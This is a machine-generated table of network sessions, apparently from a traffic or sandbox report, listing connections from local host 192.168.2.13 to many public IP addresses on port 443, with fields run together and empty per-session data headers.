                                                22384192.168.2.1335574129.14.154.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22385192.168.2.1350988219.2.52.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22386192.168.2.133934669.44.208.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22387192.168.2.13479241.121.4.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22388192.168.2.1341872139.96.109.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22389192.168.2.134669477.74.146.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22390192.168.2.1334886222.121.83.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22391192.168.2.13403285.155.74.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22392192.168.2.133876858.3.149.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22393192.168.2.1343588223.28.211.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22394192.168.2.135278661.119.86.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22395192.168.2.1333388155.13.186.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22396192.168.2.1344262140.94.168.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22397192.168.2.1333688155.149.92.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22398192.168.2.135573420.118.91.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22399192.168.2.13549741.49.127.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22400192.168.2.1354446208.213.13.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22401192.168.2.135097013.25.82.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22402192.168.2.133630482.60.164.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22403192.168.2.135555849.146.38.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22404192.168.2.134096446.183.56.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22405192.168.2.1349262142.135.79.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22406192.168.2.134064617.44.255.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22407192.168.2.135862851.119.11.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22408192.168.2.134753414.78.224.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22409192.168.2.134280687.9.70.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22410192.168.2.1350562132.169.80.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22411192.168.2.1352082149.175.62.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22412192.168.2.134532293.78.159.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22413192.168.2.135667639.253.178.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22414192.168.2.1357368113.88.210.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22415192.168.2.1354558112.170.18.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22416192.168.2.133789824.95.84.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22417192.168.2.1335848110.170.132.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22418192.168.2.1350744174.165.43.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22419192.168.2.1340374168.254.123.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22420192.168.2.1340618176.46.118.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22421192.168.2.1340592176.45.101.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22422192.168.2.13417148.34.34.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22423192.168.2.1349068162.20.113.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22424192.168.2.134254617.73.114.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22425192.168.2.133861237.132.73.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22426192.168.2.1334198150.178.197.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22427192.168.2.1354186196.213.116.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22428192.168.2.1344516112.38.130.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22429192.168.2.1351606151.198.120.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22430192.168.2.1346916220.119.218.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22431192.168.2.1343330182.15.197.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22432192.168.2.1343344166.123.20.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22433192.168.2.133900857.140.73.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22434192.168.2.1353512197.115.119.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22435192.168.2.134010483.225.199.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22436192.168.2.13399722.131.51.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22437192.168.2.1354554174.77.237.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22438192.168.2.133583886.232.204.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22439192.168.2.133399072.105.70.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22440192.168.2.135228449.158.85.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22441192.168.2.1350794176.53.7.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22442192.168.2.1335804192.103.181.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22443192.168.2.1355970209.66.163.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22444192.168.2.135599262.5.158.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22445192.168.2.135625299.70.10.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22446192.168.2.135080061.147.85.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22447192.168.2.1333688200.231.5.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22448192.168.2.1356694121.177.204.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22449192.168.2.1346660182.6.178.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22450192.168.2.134111682.105.250.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22451192.168.2.1341670194.203.225.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22452192.168.2.1332976115.86.15.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22453192.168.2.1357034211.217.20.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22454192.168.2.133608481.185.96.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22455192.168.2.1333534217.44.87.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22456192.168.2.1358350111.187.252.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22457192.168.2.1354916106.65.19.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22458192.168.2.133579454.56.192.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22459192.168.2.1342974122.222.51.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22460192.168.2.135517097.117.188.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22461192.168.2.1352480199.245.133.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22462192.168.2.134639066.192.116.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22463192.168.2.1344348129.123.212.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22464192.168.2.1359246176.201.234.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22465192.168.2.1354490102.150.33.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22466192.168.2.1359806186.200.245.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22467192.168.2.1355050175.138.110.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22468192.168.2.1359014183.181.242.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22469192.168.2.1340928122.119.150.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22470192.168.2.1338146198.205.206.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22471192.168.2.135447290.72.75.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22472192.168.2.134682860.33.96.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22473192.168.2.1349228191.96.123.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22474192.168.2.1333806102.97.0.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22475192.168.2.1355880148.141.43.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22476192.168.2.133899858.160.132.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22477192.168.2.135863848.20.107.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22478192.168.2.134686618.47.192.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22479192.168.2.1354500170.57.138.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22480192.168.2.135616669.245.22.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22481192.168.2.1336676188.193.158.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22482192.168.2.1351552159.88.26.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22483192.168.2.134569250.38.68.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22484192.168.2.1357248202.41.144.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22485192.168.2.135502653.115.58.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22486192.168.2.1350260174.77.242.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22487192.168.2.135984093.179.88.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22488192.168.2.1350984203.163.193.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22489192.168.2.134234453.231.42.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22490192.168.2.1359806118.102.231.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22491192.168.2.135218246.193.237.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22492192.168.2.134131846.183.147.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22493192.168.2.1351156124.141.216.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22494192.168.2.136074243.53.81.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22495192.168.2.133771443.5.73.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22496192.168.2.1354498155.178.34.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22497192.168.2.134799237.39.195.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22498192.168.2.134743257.98.251.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22499192.168.2.1357458161.91.131.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22500192.168.2.1354360189.156.235.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22501192.168.2.135377679.41.170.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22502192.168.2.1351876187.240.9.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22503192.168.2.1335682206.226.160.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22504192.168.2.1335862208.146.83.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22505192.168.2.134489218.98.216.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22506192.168.2.136098043.103.2.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22507192.168.2.1347336137.224.69.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22508192.168.2.135146664.227.71.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22509192.168.2.134138442.246.133.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22510192.168.2.1343044140.244.231.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22511192.168.2.1335308110.8.171.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22512192.168.2.1352868111.44.10.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22513192.168.2.134707696.237.196.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22514192.168.2.1356470191.175.9.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22515192.168.2.1356562168.173.98.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22516192.168.2.134344052.184.42.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22517192.168.2.134751643.159.132.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22518192.168.2.13358841.127.29.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22519192.168.2.134117678.54.47.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22520192.168.2.1343438169.50.102.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22521192.168.2.135301488.80.41.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22522192.168.2.134564448.215.225.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22523192.168.2.1343438143.204.60.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22524192.168.2.134711043.208.138.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22525192.168.2.1349664139.121.239.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22526192.168.2.133527432.223.125.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22527192.168.2.133565678.63.199.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22528192.168.2.1341610101.38.110.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22529192.168.2.134263872.251.106.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22530192.168.2.134147448.39.228.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22531192.168.2.1349340190.235.219.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22532192.168.2.135429876.56.13.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22533192.168.2.135283850.12.19.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22534192.168.2.1355756201.131.28.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22535192.168.2.1350040179.143.229.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22536192.168.2.135238454.112.164.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22537192.168.2.1339130142.255.144.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22538192.168.2.133326872.184.100.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22539192.168.2.1353378141.135.73.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22540192.168.2.1333116163.100.195.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22541192.168.2.1357084194.159.242.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22542192.168.2.134274690.163.85.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22543192.168.2.133576868.86.126.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22544192.168.2.134486878.175.211.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22545192.168.2.135615873.113.243.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22546192.168.2.13549748.92.141.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22547192.168.2.1338554141.196.57.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22548192.168.2.1359558117.249.75.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22549192.168.2.135082480.90.219.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22550192.168.2.13524168.109.126.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22551192.168.2.1349178170.81.145.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22552192.168.2.134973273.81.189.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22553192.168.2.1340636162.197.106.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22554192.168.2.1340912178.12.158.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22555192.168.2.1358510117.72.211.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22556192.168.2.135613836.138.61.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22557192.168.2.133891634.243.111.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22558192.168.2.1353140223.241.44.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22559192.168.2.1343868110.232.175.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22560192.168.2.1348042116.32.147.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22561192.168.2.135716499.210.218.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22562192.168.2.1338366111.244.232.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22563192.168.2.1345650154.46.60.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22564192.168.2.1357206148.118.105.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22565192.168.2.1347418151.73.9.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22566192.168.2.1352818190.252.37.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22567192.168.2.1337212171.169.155.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22568192.168.2.134998270.39.99.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22569192.168.2.1360872216.201.144.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22570192.168.2.134858286.48.231.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22571192.168.2.134359445.202.69.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22572192.168.2.1338942204.74.71.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22573192.168.2.134130271.249.70.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22574192.168.2.1337706154.252.150.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22575192.168.2.1340230190.0.55.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22576192.168.2.134549631.173.243.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22577192.168.2.1336848217.75.101.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22578192.168.2.135250080.181.151.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22579192.168.2.133678613.160.10.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22580192.168.2.1333364132.67.233.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22581192.168.2.1336764139.239.237.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22582192.168.2.1334056201.142.175.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22583192.168.2.1360200158.210.101.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22584192.168.2.134327257.203.46.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22585192.168.2.134308498.127.198.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22586192.168.2.136054884.110.19.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22587192.168.2.1355558172.136.2.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22588192.168.2.1354908104.236.61.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22589192.168.2.135353017.38.177.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22590192.168.2.1357772222.200.95.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22591192.168.2.135091269.237.224.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22592192.168.2.1353914159.93.228.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22593192.168.2.134826084.44.82.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22594192.168.2.1344858158.209.42.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22595192.168.2.1332968206.71.169.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22596192.168.2.134902071.224.204.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22597192.168.2.1342078194.46.130.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22598192.168.2.133715494.83.166.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22599192.168.2.1338078170.200.189.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22600192.168.2.133768654.121.50.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22601192.168.2.134223267.205.16.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22602192.168.2.1343742113.202.66.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22603192.168.2.134969836.189.139.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22604192.168.2.134933050.110.82.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22605192.168.2.13455041.227.177.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
